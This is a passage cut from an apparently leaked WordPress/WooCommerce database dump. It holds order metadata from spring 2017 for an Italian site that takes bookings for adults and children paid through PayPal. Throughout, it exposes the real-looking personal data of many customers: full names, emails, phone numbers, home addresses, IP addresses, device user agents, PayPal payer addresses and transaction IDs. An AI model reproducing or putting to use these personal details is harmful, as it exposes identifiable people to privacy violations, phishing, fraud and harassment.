,325,'_wc_review_count','0'),(3780,322,'_wc_review_count','0'),(3781,323,'_wc_review_count','0'),(3782,333,'_wc_review_count','0'),(3783,334,'_wc_review_count','0'),(3784,328,'_wc_review_count','0'),(3785,337,'_wc_review_count','0'),(3786,331,'_wc_review_count','0'),(3788,327,'_wc_review_count','0'),(3789,329,'_wc_review_count','0'),(3790,342,'_order_key','wc_order_58d4053a705a9'),(3791,342,'_order_currency','EUR'),(3792,342,'_prices_include_tax','no'),(3793,342,'_customer_ip_address','5.170.76.96'),(3794,342,'_customer_user_agent','Mozilla/5.0 (Linux; Android 5.1.1; C6833 Build/14.6.A.1.236) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.81 Mobile Safari/537.36'),(3795,342,'_customer_user','0'),(3796,342,'_created_via','checkout'),(3797,342,'_cart_hash','9fc8f4788cf201ff6506a57f3d1dadc2'),(3798,342,'_order_version','2.6.14'),(3799,342,'_billing_first_name','Maria Antonietta'),(3800,342,'_billing_last_name','Berardi'),(3801,342,'_billing_email','mariaantonietta.berardi@asmn.re.it'),(3802,342,'_billing_phone','3498247654'),(3803,342,'_billing_address_1','Via T. Mann 15'),(3804,342,'_billing_city','Reggio Emilia'),(3805,342,'_shipping_first_name','Maria Antonietta'),(3806,342,'_shipping_last_name','Berardi'),(3807,342,'_shipping_company',''),(3808,342,'_shipping_country',''),(3809,342,'_shipping_address_1','Via T. Mann 15'),(3810,342,'_shipping_address_2',''),(3811,342,'_shipping_city','Reggio Emilia'),(3812,342,'_shipping_state',''),(3813,342,'_shipping_postcode',''),(3814,342,'_payment_method','paypal'),(3815,342,'_payment_method_title','PayPal'),(3816,342,'_order_shipping',''),(3817,342,'_cart_discount','0'),(3818,342,'_cart_discount_tax','0'),(3819,342,'_order_tax','0'),(3820,342,'_order_shipping_tax','0'),(3821,342,'_order_total','50.00'),(3822,342,'Numero Persone Adulte','2'),(3823,342,'Numero bambini fino a 6 anni',''),(3824,342,'Numero ragazzi fino a 13 anni',''),(3825,342,'Files attached','[]'),(3826,342,'Payer PayPal address','mariaantonietta.berardi@asmn.re.it'),(3827,342,'Payer first name','maria antonietta'),(3828,342,'Payer last name','berardi'),(3829,342,'Payment type','instant'),(3830,342,'_download_permissions_granted','1'),(3831,342,'_recorded_sales','yes'),(3832,342,'_paid_date','2017-03-23 18:29:46'),(3833,342,'_transaction_id','59A38234FM665650U'),(3834,342,'_order_stock_reduced','1'),(3835,342,'PayPal Transaction Fee','2.05'),(3836,343,'_order_key','wc_order_58d4140fbe7a9'),(3837,343,'_order_currency','EUR'),(3838,343,'_prices_include_tax','no'),(3839,343,'_customer_ip_address','93.34.113.118'),(3840,343,'_customer_user_agent','Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-T719 Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Safari/537.36'),(3841,343,'_customer_user','8'),(3842,343,'_created_via','checkout'),(3843,343,'_cart_hash','9fc8f4788cf201ff6506a57f3d1dadc2'),(3844,343,'_order_version','2.6.14'),(3845,343,'_billing_first_name','Francesco'),(3846,343,'_billing_last_name','Turco'),(3847,343,'_billing_email','francesco.turco71@gmail.com'),(3848,343,'_billing_phone','3298467775'),(3849,343,'_billing_address_1','Viale della Repubblica, 4'),(3850,343,'_billing_city','Bologna'),(3851,343,'_shipping_first_name','Francesco'),(3852,343,'_shipping_last_name','Turco'),(3853,343,'_shipping_company',''),(3854,343,'_shipping_country',''),(3855,343,'_shipping_address_1','Viale della Repubblica, 4'),(3856,343,'_shipping_address_2',''),(3857,343,'_shipping_city','Bologna'),(3858,343,'_shipping_state',''),(3859,343,'_shipping_postcode',''),(3860,343,'_payment_method','paypal'),(3861,343,'_payment_method_title','PayPal'),(3862,343,'_order_shipping',''),(3863,343,'_cart_discount','0'),(3864,343,'_cart_discount_tax','0'),(3865,343,'_order_tax','0'),(3866,343,'_order_shipping_tax','0'),(3867,343,'_order_total','50.00'),(3868,343,'Numero Persone Adulte','2'),(3869,343,'Numero bambini fino a 6 anni','1'),(3870,343,'Numero ragazzi fino a 13 anni',''),(3871,343,'Files attached','[]'),(3872,343,'Payer PayPal address','francesco.turco71@gmail.com'),(3873,343,'Payer first name','Francesco'),(3874,343,'Payer last name','Turco'),(3875,343,'Payment type','instant'),(3876,343,'_download_permissions_granted','1'),(3877,343,'_recorded_sales','yes'),(3878,343,'_paid_date','2017-03-23 19:36:06'),(3879,343,'_transaction_id','74M38505T3852561U'),(3880,343,'_order_stock_reduced','1'),(3881,343,'PayPal Transaction Fee','2.05'),(3882,344,'_order_key','wc_order_58d4ea025863f'),(3883,344,'_order_currency','EUR'),(3884,344,'_prices_include_tax','no'),(3885,344,'_customer_ip_address','77.234.40.146'),(3886,344,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(3887,344,'_customer_user','0'),(3888,344,'_created_via','checkout'),(3889,344,'_cart_hash','fcc2a89ac01df8f822c92489e06bb8e6'),(3890,344,'_order_version','2.6.14'),(3891,344,'_billing_first_name','edoardo'),(3892,344,'_billing_last_name','zona'),(3893,344,'_billing_email','edoardozona@msn.com'),(3894,344,'_billing_phone','3371083343'),(3895,344,'_billing_address_1','via don piero folli'),(3896,344,'_billing_city','Luino'),(3897,344,'_shipping_first_name','edoardo'),(3898,344,'_shipping_last_name','zona'),(3899,344,'_shipping_company',''),(3900,344,'_shipping_country',''),(3901,344,'_shipping_address_1','via don piero folli'),(3902,344,'_shipping_address_2',''),(3903,344,'_shipping_city','Luino'),(3904,344,'_shipping_state',''),(3905,344,'_shipping_postcode',''),(3906,344,'_payment_method','paypal'),(3907,344,'_payment_method_title','PayPal'),(3908,344,'_order_shipping',''),(3909,344,'_cart_discount','0'),(3910,344,'_cart_discount_tax','0'),(3911,344,'_order_tax','0'),(3912,344,'_order_shipping_tax','0'),(3913,344,'_order_total','75.00'),(3914,344,'Numero Persone Adulte','2'),(3915,344,'Numero bambini fino a 6 anni','0'),(3916,344,'Numero ragazzi fino a 13 anni','1'),(3917,344,'Files attached','[]'),(3918,344,'Payer PayPal address','info@zona-piscine.it'),(3919,344,'Payer first name','Edoardo'),(3920,344,'Payer last name','Zona'),(3921,344,'Payment type','instant'),(3922,344,'_download_permissions_granted','1'),(3923,344,'_recorded_sales','yes'),(3924,344,'_paid_date','2017-03-24 10:43:35'),(3925,344,'_transaction_id','2L6948360S189270M'),(3926,344,'_order_stock_reduced','1'),(3927,344,'PayPal Transaction Fee','2.90'),(3928,345,'_order_key','wc_order_58d6c09c07ad3'),(3929,345,'_order_currency','EUR'),(3930,345,'_prices_include_tax','no'),(3931,345,'_customer_ip_address','93.34.115.230'),(3932,345,'_customer_user_agent','Mozilla/5.0 (iPad; CPU OS 9_3_5 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) GSA/24.0.150344369 Mobile/13G36 Safari/601.1'),(3933,345,'_customer_user','0'),(3934,345,'_created_via','checkout'),(3935,345,'_cart_hash','79933357867cf7ca67c9e69e42b946c2'),(3936,345,'_order_version','2.6.14'),(3937,345,'_billing_first_name','Luca'),(3938,345,'_billing_last_name','Pitton'),(3939,345,'_billing_email','lucapitton24@gmail.com'),(3940,345,'_billing_phone','3478681892'),(3941,345,'_billing_address_1',''),(3942,345,'_billing_city',''),(3943,345,'_shipping_first_name','Luca'),(3944,345,'_shipping_last_name','Pitton'),(3945,345,'_shipping_company',''),(3946,345,'_shipping_country',''),(3947,345,'_shipping_address_1',''),(3948,345,'_shipping_address_2',''),(3949,345,'_shipping_city',''),(3950,345,'_shipping_state',''),(3951,345,'_shipping_postcode',''),(3952,345,'_payment_method','paypal'),(3953,345,'_payment_method_title','PayPal'),(3954,345,'_order_shipping',''),(3955,345,'_cart_discount','0'),(3956,345,'_cart_discount_tax','0'),(3957,345,'_order_tax','0'),(3958,345,'_order_shipping_tax','0'),(3959,345,'_order_total','50.00'),(3960,345,'Numero Persone Adulte','2'),(3961,345,'Numero bambini fino a 6 anni',''),(3962,345,'Numero ragazzi fino a 13 anni',''),(3963,345,'Files attached','[]'),(3964,345,'Payer PayPal address','lucapaolo.pitton@fastwebnet.it'),(3965,345,'Payer first name','LUCA PAOLO'),(3966,345,'Payer last name','PITTON'),(3967,345,'Payment type','instant'),(3968,345,'_download_permissions_granted','1'),(3969,345,'_recorded_sales','yes'),(3970,345,'_paid_date','2017-03-25 20:11:52'),(3971,345,'_transaction_id','1U302816MP033232X'),(3972,345,'_order_stock_reduced','1'),(3973,345,'PayPal Transaction Fee','2.05'),(3974,346,'_order_key','wc_order_58d6cc8a31800'),(3975,346,'_order_currency','EUR'),(3976,346,'_prices_include_tax','no'),(3977,346,'_customer_ip_address','79.32.190.132'),(3978,346,'_customer_user_agent','Mozilla/5.0 (Linux; U; Android 4.2.2; it-it; GT-P5200 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30'),(3979,346,'_customer_user','0'),(3980,346,'_created_via','checkout'),(3981,346,'_cart_hash','7c52a3a41a7d0a571fe047e0693c0399'),(3982,346,'_order_version','2.6.14'),(3983,346,'_billing_first_name','Rino'),(3984,346,'_billing_last_name','Forni'),(3985,346,'_billing_email','silvana.rino@alice.it'),(3986,346,'_billing_phone','3386161878'),(3987,346,'_billing_address_1','Via don Natale Villa 11'),(3988,346,'_billing_city','Rimini'),(3989,346,'_shipping_first_name','Rino'),(3990,346,'_shipping_last_name','Forni'),(3991,346,'_shipping_company',''),(3992,346,'_shipping_country',''),(3993,346,'_shipping_address_1','Via don Natale Villa 11'),(3994,346,'_shipping_address_2',''),(3995,346,'_shipping_city','Rimini'),(3996,346,'_shipping_state',''),(3997,346,'_shipping_postcode',''),(3998,346,'_payment_method','paypal'),(3999,346,'_payment_method_title','PayPal'),(4000,346,'_order_shipping',''),(4001,346,'_cart_discount','0'),(4002,346,'_cart_discount_tax','0'),(4003,346,'_order_tax','0'),(4004,346,'_order_shipping_tax','0'),(4005,346,'_order_total','100.00'),(4006,346,'Numero Persone Adulte','4'),(4007,346,'Numero bambini fino a 6 anni',''),(4008,346,'Numero ragazzi fino a 13 anni',''),(4009,346,'Files attached','[]'),(4010,346,'Payer PayPal address','silvana.rino@alice.it'),(4011,346,'Payer first name','Silvana'),(4012,346,'Payer last name','Ferrero'),(4013,346,'Payment type','instant'),(4014,346,'_download_permissions_granted','1'),(4015,346,'_recorded_sales','yes'),(4016,346,'_paid_date','2017-03-25 21:07:56'),(4017,346,'_transaction_id','9M037811RM8307746'),(4018,346,'_order_stock_reduced','1'),(4019,346,'PayPal Transaction Fee','3.75'),(4022,347,'_order_key','wc_order_58da1e956581c'),(4023,347,'_order_currency','EUR'),(4024,347,'_prices_include_tax','no'),(4025,347,'_customer_ip_address','79.58.20.152'),(4026,347,'_customer_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),(4027,347,'_customer_user','0'),(4028,347,'_created_via','checkout'),(4029,347,'_cart_hash','9fc8f4788cf201ff6506a57f3d1dadc2'),(4030,347,'_order_version','2.6.14'),(4031,347,'_billing_first_name','ANDREA'),(4032,347,'_billing_last_name','BURINI'),(4033,347,'_billing_email','andreaburini.ing@gmail.com'),(4034,347,'_billing_phone','3293643028'),(4035,347,'_billing_address_1',''),(4036,347,'_billing_city','Perugia'),(4037,347,'_shipping_first_name','ANDREA'),(4038,347,'_shipping_last_name','BURINI'),(4039,347,'_shipping_company',''),(4040,347,'_shipping_country',''),(4041,347,'_shipping_address_1',''),(4042,347,'_shipping_address_2',''),(4043,347,'_shipping_city','Perugia'),(4044,347,'_shipping_state',''),(4045,347,'_shipping_postcode',''),(4046,347,'_payment_method','paypal'),(4047,347,'_payment_method_title','PayPal'),(4048,347,'_order_shipping',''),(4049,347,'_cart_discount','0'),(4050,347,'_cart_discount_tax','0'),(4051,347,'_order_tax','0'),(4052,347,'_order_shipping_tax','0'),(4053,347,'_order_total','50.00'),(4054,347,'Numero Persone Adulte','2'),(4055,347,'Numero bambini fino a 6 anni',''),(4056,347,'Numero ragazzi fino a 13 anni',''),(4057,347,'Files attached','[]'),(4058,347,'Payer PayPal address','andreaburini.ing@gmail.com'),(4059,347,'Payer first name','ANDREA'),(4060,347,'Payer last name','BURINI'),(4061,347,'Payment type','instant'),(4062,347,'_download_permissions_granted','1'),(4063,347,'_recorded_sales','yes'),(4064,347,'_paid_date','2017-03-28 10:30:40'),(4065,347,'_transaction_id','3TJ85352EU6307929'),(4066,347,'_order_stock_reduced','1'),(4067,347,'PayPal Transaction Fee','2.05'),(4068,348,'_order_key','wc_order_58da47a91738c'),(4069,348,'_order_currency','EUR'),(4070,348,'_prices_include_tax','no'),(4071,348,'_customer_ip_address','93.33.157.188'),(4072,348,'_customer_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10'),(4073,348,'_customer_user','9'),(4074,348,'_created_via','checkout'),(4075,348,'_cart_hash','7c52a3a41a7d0a571fe047e0693c0399'),(4076,348,'_order_version','2.6.14'),(4077,348,'_billing_first_name','Matteo'),(4078,348,'_billing_last_name','Gobbi'),(4079,348,'_billing_email','matteo.gbb@gmail.com'),(4080,348,'_billing_phone','3392854860'),(4081,348,'_billing_address_1','via A.Ghisleri 35/H'),(4082,348,'_billing_city','Piacenza'),(4083,348,'_shipping_first_name','Matteo'),(4084,348,'_shipping_last_name','Gobbi'),(4085,348,'_shipping_company',''),(4086,348,'_shipping_country',''),(4087,348,'_shipping_address_1','via A.Ghisleri 35/H'),(4088,348,'_shipping_address_2',''),(4089,348,'_shipping_city','Piacenza'),(4090,348,'_shipping_state',''),(4091,348,'_shipping_postcode',''),(4092,348,'_payment_method','paypal'),(4093,348,'_payment_method_title','PayPal'),(4094,348,'_order_shipping',''),(4095,348,'_cart_discount','0'),(4096,348,'_cart_discount_tax','0'),(4097,348,'_order_tax','0'),(4098,348,'_order_shipping_tax','0'),(4099,348,'_order_total','100.00'),(4100,348,'Numero Persone Adulte','4'),(4101,348,'Numero bambini fino a 6 anni',''),(4102,348,'Numero ragazzi fino a 13 anni',''),(4103,348,'Files attached','[]'),(4104,348,'Payer PayPal address','matteo.gbb@gmail.com'),(4105,348,'Payer first name','Matteo'),(4106,348,'Payer last name','Gobbi'),(4107,348,'Payment type','instant'),(4108,348,'_download_permissions_granted','1'),(4109,348,'_recorded_sales','yes'),(4110,348,'_paid_date','2017-03-28 13:24:26'),(4111,348,'_transaction_id','0Y03793602959483G'),(4112,348,'_order_stock_reduced','1'),(4113,348,'PayPal Transaction Fee','3.75'),(4114,349,'_order_key','wc_order_58dc19f6aa1ec'),(4115,349,'_order_currency','EUR'),(4116,349,'_prices_include_tax','no'),(4117,349,'_customer_ip_address','79.44.144.66'),(4118,349,'_customer_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),(4119,349,'_customer_user','10'),(4120,349,'_created_via','checkout'),(4121,349,'_cart_hash','fcc2a89ac01df8f822c92489e06bb8e6'),(4122,349,'_order_version','2.6.14'),(4123,349,'_billing_first_name','DAVIDE'),(4124,349,'_billing_last_name','PERNI'),(4125,349,'_billing_email','davide.perni@ducati.com'),(4126,349,'_billing_phone','3337368152'),(4127,349,'_billing_address_1','via Cadriano 79/50'),(4128,349,'_billing_city','Granarolo dell\'Emilia (BO)'),(4129,349,'_shipping_first_name','DAVIDE'),(4130,349,'_shipping_last_name','PERNI'),(4131,349,'_shipping_company',''),(4132,349,'_shipping_country',''),(4133,349,'_shipping_address_1','via Cadriano 79/50'),(4134,349,'_shipping_address_2',''),(4135,349,'_shipping_city','Granarolo dell\'Emilia (BO)'),(4136,349,'_shipping_state',''),(4137,349,'_shipping_postcode',''),(4138,349,'_payment_method','paypal'),(4139,349,'_payment_method_title','PayPal'),(4140,349,'_order_shipping',''),(4141,349,'_cart_discount','0'),(4142,349,'_cart_discount_tax','0'),(4143,349,'_order_tax','0'),(4144,349,'_order_shipping_tax','0'),(4145,349,'_order_total','75.00'),(4146,349,'Numero Persone Adulte','3'),(4147,349,'Numero bambini fino a 6 anni','0'),(4148,349,'Numero ragazzi fino a 13 anni','0'),(4149,349,'Files attached','[]'),(4150,349,'Payer PayPal address','davide.perni@ducati.com'),(4151,349,'Payer first name','DAVIDE'),(4152,349,'Payer last name','PERNI'),(4153,349,'Payment type','instant'),(4154,349,'_download_permissions_granted','1'),(4155,349,'_recorded_sales','yes'),(4156,349,'_paid_date','2017-03-29 22:35:41'),(4157,349,'_transaction_id','6A259558D3140674F'),(4158,349,'_order_stock_reduced','1'),(4159,349,'PayPal Transaction Fee','2.90'),(4160,350,'_order_key','wc_order_58dd0610a1e54'),(4161,350,'_order_currency','EUR'),(4162,350,'_prices_include_tax','no'),(4163,350,'_customer_ip_address','82.50.22.194'),(4164,350,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(4165,350,'_customer_user','0'),(4166,350,'_created_via','checkout'),(4167,350,'_cart_hash','79933357867cf7ca67c9e69e42b946c2'),(4168,350,'_order_version','2.6.14'),(4169,350,'_billing_first_name','Piero'),(4170,350,'_billing_last_name','Cavallari'),(4171,350,'_billing_email','cavallari.piero@gmail.com'),(4172,350,'_billing_phone','3357785725'),(4173,350,'_billing_address_1','VIA TIZZANO 27/2'),(4174,350,'_billing_city','CASALECCHIO DI RENO'),(4175,350,'_shipping_first_name','Piero'),(4176,350,'_shipping_last_name','Cavallari'),(4177,350,'_shipping_company',''),(4178,350,'_shipping_country',''),(4179,350,'_shipping_address_1','VIA TIZZANO 27/2'),(4180,350,'_shipping_address_2',''),(4181,350,'_shipping_city','CASALECCHIO DI RENO'),(4182,350,'_shipping_state',''),(4183,350,'_shipping_postcode',''),(4184,350,'_payment_method','paypal'),(4185,350,'_payment_method_title','PayPal'),(4186,350,'_order_shipping',''),(4187,350,'_cart_discount','0'),(4188,350,'_cart_discount_tax','0'),(4189,350,'_order_tax','0'),(4190,350,'_order_shipping_tax','0'),(4191,350,'_order_total','50.00'),(4192,350,'Numero Persone Adulte','2'),(4193,350,'Numero bambini fino a 6 anni',''),(4194,350,'Numero ragazzi fino a 13 anni',''),(4195,350,'Files attached','[]'),(4196,350,'Payer PayPal address','cavallari.piero@gmail.com'),(4197,350,'Payer first name','Piero'),(4198,350,'Payer last name','Cavallari'),(4199,350,'Payment type','instant'),(4200,350,'_download_permissions_granted','1'),(4201,350,'_recorded_sales','yes'),(4202,350,'_paid_date','2017-03-30 15:22:39'),(4203,350,'_transaction_id','3GU90192WP081802Y'),(4204,350,'_order_stock_reduced','1'),(4205,350,'PayPal Transaction Fee','2.05'),(4206,351,'_order_key','wc_order_58df96161c54e'),(4207,351,'_order_currency','EUR'),(4208,351,'_prices_include_tax','no'),(4209,351,'_customer_ip_address','5.90.20.80'),(4210,351,'_customer_user_agent','Mozilla/5.0 (Linux; Android 5.1.1; SM-N7505 Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36'),(4211,351,'_customer_user','0'),(4212,351,'_created_via','checkout'),(4213,351,'_cart_hash','9fc8f4788cf201ff6506a57f3d1dadc2'),(4214,351,'_order_version','2.6.14'),(4215,351,'_billing_first_name','Mario'),(4216,351,'_billing_last_name','Schingo'),(4217,351,'_billing_email','mschingo@yahoo. It'),(4218,351,'_billing_phone','3338348321'),(4219,351,'_billing_address_1','Via 1 maggio 11/2'),(4220,351,'_billing_city','Malalbergo bologna'),(4221,351,'_shipping_first_name','Mario'),(4222,351,'_shipping_last_name','Schingo'),(4223,351,'_shipping_company',''),(4224,351,'_shipping_country',''),(4225,351,'_shipping_address_1','Via 1 maggio 11/2'),(4226,351,'_shipping_address_2',''),(4227,351,'_shipping_city','Malalbergo bologna'),(4228,351,'_shipping_state',''),(4229,351,'_shipping_postcode',''),(4230,351,'_payment_method','paypal'),(4231,351,'_payment_method_title','PayPal'),(4232,351,'_order_shipping',''),(4233,351,'_cart_discount','0'),(4234,351,'_cart_discount_tax','0'),(4235,351,'_order_tax','0'),(4236,351,'_order_shipping_tax','0'),(4237,351,'_order_total','50.00'),(4238,351,'Numero Persone Adulte','2'),(4239,351,'Numero bambini fino a 6 anni',''),(4240,351,'Numero ragazzi fino a 13 anni',''),(4241,351,'Files attached','[]'),(4242,351,'Payer PayPal address','mschingo@yahoo.it'),(4243,351,'Payer first name','melissa'),(4244,351,'Payer last name','schingo'),(4245,351,'Payment type','instant'),(4246,351,'_download_permissions_granted','1'),(4247,351,'_recorded_sales','yes'),(4248,351,'_paid_date','2017-04-01 14:43:29'),(4249,351,'_transaction_id','3W417467972960946'),(4250,351,'_order_stock_reduced','1'),(4251,351,'PayPal Transaction Fee','2.05'),(4252,352,'_order_key','wc_order_58dfc7339376f'),(4253,352,'_order_currency','EUR'),(4254,352,'_prices_include_tax','no'),(4255,352,'_customer_ip_address','2.238.52.44'),(4256,352,'_customer_user_agent','Mozilla/5.0 (iPad; CPU OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),(4257,352,'_customer_user','0'),(4258,352,'_created_via','checkout'),(4259,352,'_cart_hash','7c52a3a41a7d0a571fe047e0693c0399'),(4260,352,'_order_version','2.6.14'),(4261,352,'_billing_first_name','Fabrizio'),(4262,352,'_billing_last_name','Cortese'),(4263,352,'_billing_email','Fabrizio.cortese@live.it'),(4264,352,'_billing_phone','3288378876'),(4265,352,'_billing_address_1',''),(4266,352,'_billing_city',''),(4267,352,'_shipping_first_name','Fabrizio'),(4268,352,'_shipping_last_name','Cortese'),(4269,352,'_shipping_company',''),(4270,352,'_shipping_country',''),(4271,352,'_shipping_address_1',''),(4272,352,'_shipping_address_2',''),(4273,352,'_shipping_city',''),(4274,352,'_shipping_state',''),(4275,352,'_shipping_postcode',''),(4276,352,'_payment_method','paypal'),(4277,352,'_payment_method_title','PayPal'),(4278,352,'_order_shipping',''),(4279,352,'_cart_discount','0'),(4280,352,'_cart_discount_tax','0'),(4281,352,'_order_tax','0'),(4282,352,'_order_shipping_tax','0'),(4283,352,'_order_total','100.00'),(4284,352,'Numero Persone Adulte','4'),(4285,352,'Numero bambini fino a 6 anni','1'),(4286,352,'Numero ragazzi fino a 13 anni',''),(4287,352,'Files attached','[]'),(4288,353,'_order_key','wc_order_58dfd384007df'),(4289,353,'_order_currency','EUR'),(4290,353,'_prices_include_tax','no'),(4291,353,'_customer_ip_address','91.252.143.26'),(4292,353,'_customer_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),(4293,353,'_customer_user','0'),(4294,353,'_created_via','checkout'),(4295,353,'_cart_hash','7c52a3a41a7d0a571fe047e0693c0399'),(4296,353,'_order_version','2.6.14'),(4297,353,'_billing_first_name','Fabrizio'),(4298,353,'_billing_last_name','Cortese'),(4299,353,'_billing_email','Fabrizio.cortese@live.it'),(4300,353,'_billing_phone','3288378876'),(4301,353,'_billing_address_1',''),(4302,353,'_billing_city',''),(4303,353,'_shipping_first_name','Fabrizio'),(4304,353,'_shipping_last_name','Cortese'),(4305,353,'_shipping_company',''),(4306,353,'_shipping_country',''),(4307,353,'_shipping_address_1',''),(4308,353,'_shipping_address_2',''),(4309,353,'_shipping_city',''),(4310,353,'_shipping_state',''),(4311,353,'_shipping_postcode',''),(4312,353,'_payment_method','paypal'),(4313,353,'_payment_method_title','PayPal'),(4314,353,'_order_shipping',''),(4315,353,'_cart_discount','0'),(4316,353,'_cart_discount_tax','0'),(4317,353,'_order_tax','0'),(4318,353,'_order_shipping_tax','0'),(4319,353,'_order_total','100.00'),(4320,353,'Numero Persone Adulte','4'),(4321,353,'Numero bambini fino a 6 anni','1'),(4322,353,'Numero ragazzi fino a 13 anni',''),(4323,353,'Files attached','[]'),(4324,353,'Payer PayPal address','Fabrizio.cortese@live.it'),(4325,353,'Payer first name','Fabrizio salvatore'),(4326,353,'Payer last name','cortese'),(4327,353,'Payment type','instant'),(4328,353,'_download_permissions_granted','1'),(4329,353,'_recorded_sales','yes'),(4330,353,'_paid_date','2017-04-01 18:24:05'),(4331,353,'_transaction_id','0FN60536JC205674D'),(4332,353,'_order_stock_reduced','1'),(4333,353,'PayPal Transaction Fee','3.75'),(4334,354,'_order_key','wc_order_58e0b6b1b7225'),(4335,354,'_order_currency','EUR'),(4336,354,'_prices_include_tax','no'),(4337,354,'_customer_ip_address','158.148.92.22'),(4338,354,'_customer_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 9_0_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13A452 Safari/601.1'),(4339,354,'_customer_user','0'),(4340,354,'_created_via','checkout'),(4341,354,'_cart_hash','081b1edc8a931c28ecf2b77616582daa'),(4342,354,'_order_version','2.6.14'),(4343,354,'_billing_first_name','Francesca'),(4344,354,'_billing_last_name','Dall\'Aglio'),(4345,354,'_billing_email','francesca.fior@hotmail.it'),(4346,354,'_billing_phone','3339151891'),(4347,354,'_billing_address_1',''),(4348,354,'_billing_city',''),(4349,354,'_shipping_first_name','Francesca'),(4350,354,'_shipping_last_name','Dall\'Aglio'),(4351,354,'_shipping_company',''),(4352,354,'_shipping_country',''),(4353,354,'_shipping_address_1',''),(4354,354,'_shipping_address_2',''),(4355,354,'_shipping_city',''),(4356,354,'_shipping_state',''),(4357,354,'_shipping_postcode',''),(4358,354,'_payment_method','paypal'),(4359,354,'_payment_method_title','PayPal'),(4360,354,'_order_shipping',''),(4361,354,'_cart_discount','0'),(4362,354,'_cart_discount_tax','0'),(4363,354,'_order_tax','0'),(4364,354,'_order_shipping_tax','0'),(4365,354,'_order_total','75.00'),(4366,354,'Numero Persone Adulte','3'),(4367,354,'Numero bambini fino a 6 anni',''),(4368,354,'Numero ragazzi fino a 13 anni',''),(4369,354,'Files attached','[]'),(4370,354,'Payer PayPal address','francesca.fior@hotmail.it'),(4371,354,'Payer first name','Francesca'),(4372,354,'Payer last name','Dall\'Aglio'),(4373,354,'Payment type','instant'),(4374,354,'_download_permissions_granted','1'),(4375,354,'_recorded_sales','yes'),(4376,354,'_paid_date','2017-04-02 10:31:24'),(4377,354,'_transaction_id','8TT46520BP2521649'),(4378,354,'_order_stock_reduced','1'),(4379,354,'PayPal Transaction Fee','2.90'),(4380,355,'_order_key','wc_order_58e11988e2bdc'),(4381,355,'_order_currency','EUR'),(4382,355,'_prices_include_tax','no'),(4383,355,'_customer_ip_address','2.234.219.3'),(4384,355,'_customer_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(4385,355,'_customer_user','11'),(4386,355,'_created_via','checkout'),(4387,355,'_cart_hash','79933357867cf7ca67c9e69e42b946c2'),(4388,355,'_order_version','2.6.14'),(4389,355,'_billing_first_name','Piero'),(4390,355,'_billing_last_name','Maccagnani'),(4391,355,'_billing_email','maccagnani.piero@gmail.com'),(4392,355,'_billing_phone','3395738260'),(4393,355,'_billing_address_1','via Andrea Costa 127, 40134'),(4394,355,'_billing_city','Bologna'),(4395,355,'_shipping_first_name','Piero'),(4396,355,'_shipping_last_name','Maccagnani'),(4397,355,'_shipping_company',''),(4398,355,'_shipping_country',''),(4399,355,'_shipping_address_1','via Andrea Costa 127, 40134'),(4400,355,'_shipping_address_2',''),(4401,355,'_shipping_city','Bologna'),(4402,355,'_shipping_state',''),(4403,355,'_shipping_postcode',''),(4404,355,'_payment_method','paypal'),(4405,355,'_payment_method_title','PayPal'),(4406,355,'_order_shipping',''),(4407,355,'_cart_discount','0'),(4408,355,'_cart_discount_tax','0'),(4409,355,'_order_tax','0'),(4410,355,'_order_shipping_tax','0'),(4411,355,'_order_total','50.00'),(4412,355,'Numero Persone Adulte','2'),(4413,355,'Numero bambini fino a 6 anni',''),(4414,355,'Numero ragazzi fino a 13 anni',''),(4415,355,'Files attached','[]'),(4416,355,'Payer PayPal address','maccagnani.piero@gmail.com'),(4417,355,'Payer first name','Piero'),(4418,355,'Payer last name','Maccagnani'),(4419,355,'Payment type','instant'),(4420,355,'_download_permissions_granted','1'),(4421,355,'_recorded_sales','yes'),(4422,355,'_paid_date','2017-04-02 17:34:47'),(4423,355,'_transaction_id','5PR66028HY640251A'),(4424,355,'_order_stock_reduced','1'),(4425,355,'PayPal Transaction Fee','2.05'),(4426,357,'_order_key','wc_order_58e34ce8aea1d'),(4427,357,'_order_currency','EUR'),(4428,357,'_prices_include_tax','no'),(4429,357,'_customer_ip_address','5.168.167.135'),(4430,357,'_customer_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_5 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13G36 Safari/601.1'),(4431,357,'_customer_user','0'),(4432,357,'_created_via','checkout'),(4433,357,'_cart_hash','9fc8f4788cf201ff6506a57f3d1dadc2'),(4434,357,'_order_version','2.6.14'),(4435,357,'_billing_first_name','Gianpaolo'),(4436,357,'_billing_last_name','Frosi'),(4437,357,'_billing_email','g.paolo@fcfweb.com'),(4438,357,'_billing_phone','333 7996415'),(4439,357,'_billing_address_1','Via Pertini 